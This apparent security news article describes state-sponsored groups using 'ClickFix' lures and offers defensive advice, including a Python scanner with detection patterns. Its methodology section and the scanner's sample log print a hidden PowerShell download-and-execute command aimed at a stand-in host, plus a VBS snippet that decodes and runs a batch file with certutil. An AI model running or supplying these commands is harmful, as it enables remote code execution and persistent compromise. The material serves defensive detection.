
State-sponsored threat actors have increasingly adopted the “ClickFix” social engineering tactic, according to recent reports from cybersecurity researchers. This technique involves tricking users into executing malicious commands by disguising them as solutions to fake technical issues. The method has proven effective against government agencies, defense contractors, and think tanks across multiple regions.
Technical Overview of ClickFix Attacks
The ClickFix technique represents an evolution in social engineering attacks, moving away from traditional malicious attachments toward direct command execution. Attackers impersonate legitimate platforms like Microsoft or Google Docs, presenting victims with fabricated error messages that prompt them to run PowerShell or Windows command-line (cmd.exe) commands. Proofpoint researchers note that this approach bypasses traditional security controls by relying on user actions rather than file-based payloads.
Recent campaigns have shown sophisticated variations of this technique. Kimsuky (TA427) actors created fake device registration pages that instructed users to run PowerShell commands, while MuddyWater (TA450) spoofed Microsoft security alerts pushing remote management tools. The UNK_RemoteRogue group took this further by compromising Zimbra email servers to redirect victims to malicious pages containing Empire C2 framework code.
Key Threat Actors and Campaign Details
Multiple advanced persistent threat (APT) groups have incorporated ClickFix into their operations since late 2024. Kimsuky, associated with North Korean interests, targeted think tanks analyzing North Korean policy with fake emails posing as Japanese diplomats. Their attacks used VBS scripts configured to run every 19 minutes, maintaining persistence while fetching QuasarRAT payloads.
MuddyWater (TA450), linked to Iranian interests, focused on Middle Eastern governments and Western enterprises. Their campaigns featured fake Microsoft alerts that prompted users to install “Level” RMM tools for data exfiltration. Microsoft has observed these groups using increasingly convincing PowerShell prompts disguised as legitimate system notifications.
Attack Methodology and Technical Indicators
The ClickFix technique follows a consistent pattern across campaigns. Attackers first deliver a phishing email or fake error message containing instructions to resolve a purported technical issue. Victims are then directed to copy and execute commands of the following form:
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"
Kimsuky’s VBS script implementation demonstrates the persistence mechanisms employed:
Set objShell = CreateObject("WScript.Shell")
' Decode the certutil-encoded batch file and run it; the trailing 0 keeps the console window hidden
objShell.Run "cmd /c certutil -decode batch_encoded.bat batch_decoded.bat && call batch_decoded.bat", 0
Defensive Recommendations
Organizations can implement several measures to mitigate ClickFix attacks. Restricting PowerShell execution through Group Policy or application whitelisting significantly reduces the attack surface. Monitoring for unusual scheduled task creation, particularly tasks that execute command-line utilities, can help detect post-exploitation activity.
User awareness training should emphasize recognizing social engineering attempts involving command execution. Technical staff should verify all instructions requiring command-line actions through official channels. Implementing network segmentation and restricting outbound connections from workstations can limit data exfiltration opportunities.
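Added example, not from the article or the reports it cites: a small Python scanner that applies the detection ideas above (hidden-window PowerShell that downloads and invokes code, certutil -decode unpacking a batch file, wscript.exe spawning cmd.exe, and short-interval scheduled tasks) to process-creation log lines. The simplified log format, rule names and sample lines are constructed assumptions, not a real product's output.

```python
import re

# Constructed rules over a simplified "ParentImage=... Image=... CommandLine=..." line format.
# Each entry: (rule name, case-insensitive regex). Rule order fixes the order of reported hits.
RULES = [
    # PowerShell with a hidden window that fetches and executes remote code in memory
    ("ps_hidden_download_exec",
     r"powershell.*?-w(indowstyle)?\s+hidden.*?(IEX|Invoke-Expression).*?DownloadString"),
    # certutil abused to decode an encoded batch file (the Kimsuky VBS pattern above)
    ("certutil_decode_batch",
     r"certutil(\.exe)?\s+-decode\s+\S+\s+\S+\.bat"),
    # a script host launching a command shell
    ("wscript_spawns_cmd",
     r"ParentImage=\S*wscript\.exe\s+Image=\S*cmd\.exe"),
    # scheduled task with a minute-based repeat; group(2) captures the interval
    ("schtasks_short_interval",
     r"schtasks(\.exe)?\s+/create.*?/sc\s+minute\s+/mo\s+([0-9]{1,2})\b"),
]

def match_rules(line):
    """Return the names of the rules that fire on a single log line."""
    hits = []
    for name, pattern in RULES:
        m = re.search(pattern, line, re.IGNORECASE)
        if not m:
            continue
        # Only flag tasks that repeat every 30 minutes or less (19 min in the reported campaign)
        if name == "schtasks_short_interval" and int(m.group(2)) > 30:
            continue
        hits.append(name)
    return hits

def scan(lines):
    """Map the index of each suspicious line to its rule hits; clean lines are omitted."""
    findings = {}
    for i, line in enumerate(lines):
        hits = match_rules(line)
        if hits:
            findings[i] = hits
    return findings

# Constructed sample log: three suspicious lines mirroring the article's indicators and one benign line.
SAMPLE_LOG = [
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.site/payload.ps1\')"',
    'ParentImage=C:\\Windows\\System32\\wscript.exe Image=C:\\Windows\\System32\\cmd.exe '
    'CommandLine=cmd /c certutil -decode batch_encoded.bat batch_decoded.bat && call batch_decoded.bat',
    'ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\schtasks.exe '
    'CommandLine=schtasks /create /sc minute /mo 19 /tn Update /tr wscript.exe update.vbs',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell -File C:\\Scripts\\backup.ps1',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
```

Real telemetry (Sysmon Event ID 1 or Windows Event ID 4688) carries the same parent/child and command-line fields, so the rules port directly once the field extraction is adapted.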
Conclusion
The adoption of ClickFix techniques by state-sponsored groups represents a shift toward more interactive social engineering. This approach bypasses traditional email security controls by relying on user actions rather than malicious attachments. As these tactics continue to evolve, organizations must balance technical controls with user education to maintain effective defenses.
References
- “State-sponsored hackers embrace ClickFix social engineering tactic”, BleepingComputer, 2025-04-20.
- “State-sponsored hackers leverage ClickFix social engineering in global cyber espionage”, SecureBlink, 2025-04-17.
- “Around the world in 90 days: State-sponsored actors try ClickFix”, Proofpoint.
- Dr. Todd Boudreau’s LinkedIn post on ClickFix tactics, 5 days ago.
- Alexander Pineda’s attack flow analysis.